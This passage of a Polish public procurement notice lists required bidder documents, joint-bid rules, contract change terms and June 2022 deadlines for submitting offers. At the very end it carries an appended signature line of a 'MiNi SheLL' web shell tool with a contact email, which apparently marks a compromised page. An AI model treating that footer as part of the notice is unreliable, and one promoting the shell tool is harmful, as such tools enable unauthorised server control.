z udziału w postępowaniu o udzielenie zamówienia<br/>publicznego (na podstawie art. 108 i 109 ustawy Pzp), Zamawiający wezwie Wykonawcę, którego oferta została najwyżej<br/>oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, następujących podmiotowych<br/>środków dowodowych, aktualnych na dzień złożenia tj. (art. 274 ust. 1 ustawy Pzp):<br/>3.1. Odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności<br/>Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem,<br/>jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji - w celu wykazania braku podstaw do wykluczenia z<br/>postępowania o udzielenie zamówienia w okolicznościach, o których mowa w art. 109 ust. 1 pkt 4 ustawy Pzp;<br/>- chyba że Wykonawca w Formularzu Oferty lub oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, wskaże dane<br/>umożliwiające dostęp do tych dokumentów samodzielnie przez Zamawiającego, poprzez bezpłatne i ogólnodostępne bazy<br/>danych;<br/>Dotyczy również wszystkich Wykonawców wspólnie ubiegających o zamówienie, jak również w odniesieniu do podmiotów<br/>udostępniających zasoby<br/>Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które Zamawiający posiada, jeżeli<br/>Wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i aktualność.<br/>Wykonawca składa podmiotowe środki dowodowe aktualne na dzień ich złożenia.<br/>1. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej,<br/>zamiast<br/>1) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, o którym mowa w Rozdziale 16 ust.3 pkt 1) SWZ – składa dokument lub<br/>dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania,<br/>potwierdzające odpowiednio, że:<br/>a) nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd,<br/>nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje<br/>się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach<br/>miejsca wszczęcia tej procedury.<br/>Dokumenty te powinny być wystawione nie wcześniej niż 3 miesiące przed ich złożeniem.<br/>2. Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się<br/>dokumentów, o których mowa w Rozdziale 16 ust. 3 SWZ, w § 4 ust. 1 Rozp., o których mowa w art.<br/>128 ust. 6 ustawy lub gdy dokumenty te nie odnoszą się do wszystkich przypadków, o których mowa w<br/>art. 108 ust. 1 pkt 1, 2 i 4, art. 109 ust. 1 pkt 1, 2 lit. a i b oraz pkt 3 ustawy, zastępuje się je<br/>odpowiednio w całości lub w części dokumentem zawierającym odpowiednio oświadczenie<br/>wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie<br/>osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub, jeżeli w kraju, w którym wykonawca<br/>ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu pod przysięgą, złożone przed<br/>organem sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy.<br/>(...) CIĄG DALSZY zawierają zapisy Rozdziału 17 SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.	Zamawiający żąda złożenia podmiotowych środków dowodowych na potwierdzenie spełnienia warunków udziału w postępowaniu oraz na potwierdzenia braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu o udzielenie zamówienia publicznego.<br/>2.	Zamawiający w celu potwierdzenia spełnienia warunków udziału w postępowaniu, wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, następujących podmiotowych środków dowodowych, aktualnych na dzień złożenia tj. (art. 274 ust. 1 ustawy Pzp):<br/>	2.2. wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (sporządzonego zgodnie z załącznikiem nr 10 do SWZ);</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wraz z ofertą należy złożyć następujące dokumenty:<br/>A: Wypełniony i podpisany FORMULARZ OFERTY<br/>- którego wzór stanowi załącznik nr 1 do SWZ.<br/>3.1 OŚWIADCZENIE WSTĘPNE (art. 125 ust 1 ustawy Pzp),<br/>- załącznik nr 2 do SWZ w zakresie wskazanym przez Zamawiającego w Rozdziale 13 ust. 2<br/>SWZ<br/>- załącznik nr 3 do SWZ w zakresie wskazanym przez Zamawiającego w Rozdziale 14 ust. 1 i<br/>Rozdziale 15 ust 1 SWZ.<br/>- w przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie o<br/>spełnieniu warunków udziału w postępowaniu składa ich pełnomocnik.<br/>3.2 ZOBOWIĄZANIE PODMIOTU UDOSTĘPNIAJĄCEGO ZASOBY<br/>Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby,<br/>składa wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania mu do<br/>dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy<br/>potwierdzający, że wykonawca realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami tych podmiotów<br/>- wzór zobowiązania stanowi załącznik nr 4 do SWZ.<br/>3.3 OŚWIADCZENIE WYKONAWCÓW WSPÓLNIE UBIEGAJĄCY SIĘ O UDZELENIE<br/>ZAMÓWIENIA (konsorcjum, spółka cywilna itp.)<br/>- wzór oświadczenia stanowi załącznik nr 6 do SWZ (jeżeli dotyczy).<br/>Uwaga: Oświadczenie ma być złożone wraz z ofertą (jeżeli dotyczy). Oświadczenie ma być<br/>podpisane przez każdego z wykonawców występujących wspólnie.<br/>3.4 PEŁNOMOCNICTWA<br/>Mają być złożone w formie oryginału lub kopii poświadczonej notarialnie (jeżeli dotyczy):<br/>a) w przypadku podpisania oferty przez osoby nie wymienione w odpisie z właściwego rejestru -<br/>pełnomocnictwo do podpisania oferty lub podpisania oferty i zawarcia umowy<br/>b) w przypadku podmiotów występujących wspólnie pełnomocnictwo podpisane przez<br/>upoważnionych przedstawicieli każdego z podmiotów występujących wspólnie, do reprezentowania w postępowaniu o<br/>udzielenie zamówienia albo reprezentowania w<br/>postępowaniu i zawarcia umowy w sprawie zamówienia publicznego<br/>- pełnomocnictwo może być sporządzone wg. wzoru stanowiącego załącznik nr 5 do SWZ <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 5. Zasady składania oferty przez podmioty występujące wspólnie:<br/>5.1 Wymagane oświadczenia wskazane w pkt. 3.1 niniejszego Rozdziału SWZ powinny być<br/>złożone przez każdego wykonawcę wspólnie ubiegającego się o zamówienie 5.2 W przypadku,<br/>o którym mowa w art. 117 ust. 2 i 3 stawy Pzp, wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia (konsorcjum, spółka cywilna itp.) dołączają do oferty<br/>oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają<br/>poszczególni wykonawcy (art. 117 ust. 4 ustawy Pzp) - wzór oświadczenia stanowi załącznik nr<br/>6 do SWZ. 5.3 Wykonawcy składający ofertę wspólną zobowiązani są do ustanowienia<br/>Pełnomocnika do reprezentowania ich w postępowaniu albo Pełnomocnika do reprezentowania<br/>ich w<br/>postępowaniu oraz do zawarcia umowy w sprawie zamówienia - patrz: pkt. 3.4 ppkt b) SWZ.<br/>Dokument lub dokumenty zawierający ustanowienie Pełnomocnika stanowi załącznik nr 5 do<br/>SWZ) musi zawierać w szczególności: wskazanie postępowania o zamówienie publiczne,<br/>którego dotyczy, wykonawców ubiegających się wspólnie o udzielenie zamówienia, wskazanie<br/>ustanowionego Pełnomocnika i zakres jego umocowania. Dokument (lub dokumenty)<br/>zawierający ustanowienie Pełnomocnika musi być podpisany w imieniu wszystkich wykonawców<br/>ubiegających się wspólnie o udzielenie zamówienia, przez osoby uprawnione do składania<br/>oświadczeń woli, wymienione we właściwym rejestrze lub ewidencji wykonawców. Ustanowienie<br/>przedmiotowego Pełnomocnika może zostać zawarte w umowie o<br/>współdziałaniu złożonej wraz z ofertą. Dokument (lub dokumenty) zawierający ustanowienie<br/>Pełnomocnika musi zostać złożony wraz z ofertą w formie oryginału lub notarialnie<br/>poświadczonej kopii. Do dokumentu (lub dokumentów) zawierającego ustanowienie<br/>Pełnomocnika należy załączyć dokumenty potwierdzające, że osoba udzielająca<br/>pełnomocnictwa była upoważniona do reprezentowania wykonawców w chwili udzielania<br/>pełnomocnictwa (co można wykazać w szczególności przez załączenie odpisu z Krajowego<br/>Rejestru Sądowego lub informacji odpowiadającej odpisowi aktualnemu Rejestru<br/>Przedsiębiorców pobieranej na podstawie art. 4 ust. 4aa ustawy z dnia 20 sierpnia 1997 r. o<br/>Krajowym Rejestrze Sadowym (tj. Dz. U. z 2007 r. Nr 168, poz.1186, ze zm.) albo zaświadczenie o wpisie do Centralnej Ewidencji i Informacji o Działalności Gospodarczej<br/>zgodnie z art. 46 ustawy z dnia 6 marca 2018 r. o Centralnej Ewidencji i Informacji o Działalności<br/>Gospodarczej i Punkcie Informacji dla Przedsiębiorcy (Dz.U.2020.2296). Elektroniczna kopia<br/>pełnomocnictwa nie może być uwierzytelniana przez upełnomocnionego. 5.4 Oferta wspólna<br/>składana przez dwóch lub więcej wykonawców, powinna spełniać następujące wymagania:<br/>a) Dokumenty, dotyczące własnej firmy, takie jak np.: oświadczenie o braku podstaw<br/>wykluczenia, składa każdy z wykonawców składających ofertę wspólną we własnym imieniu.<br/>b) Dokumenty wspólne takie jak np.: formularz ofertowy, dokumenty podmiotowe i przedmiotowe<br/>składa pełnomocnik wykonawców w imieniu wszystkich wykonawców składających ofertę<br/>wspólną.<br/>5.5 Wykonawca, który powołuje się na zasoby innych podmiotów, o których mowa w Rozdziale 24 ust. 3 pkt 3.2 SWZ, w<br/>celu wykazania braku istnienia wobec nich podstaw wykluczenia oraz<br/>spełniania, w zakresie, w jakim powołuje się na ich zasoby, warunków udziału w postępowaniu,<br/>składa oświadczenia wskazane w Rozdziale 24 ust 3, pkt. 3.1. SWZ zawierające informacje<br/>dotyczące tych podmiotów.<br/>5.6 Wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z Pełnomocnikiem.<br/>5.7 Wypełniając formularz oferty, jak również inne dokumenty, powołując się na wykonawcę, w<br/>miejscu np. nazwa i adres wykonawcy, należy wpisać dane dotyczące wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia, a nie Pełnomocnika tych wykonawców <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Dopuszczalne są zmiany postanowień umowy w zakresie określonym w art. 454 i 455 ustawy PZP.<br/>2.	Zamawiający przewiduje możliwość zmian umowy, o których mowa w art. 455 ust. 1 pkt 1 ustawy PZP, które mogą dotyczyć w szczególności następujących przypadków:<br/>podstawy do zmiany umowy zostały określone w załączniku nr 7 do SWZ (projekcie umowy) - ze względu na ograniczenia w ilości znaków nie ma możliwości wskazania wszystkich zmian <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-06-02 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-06-02 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-07-01</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com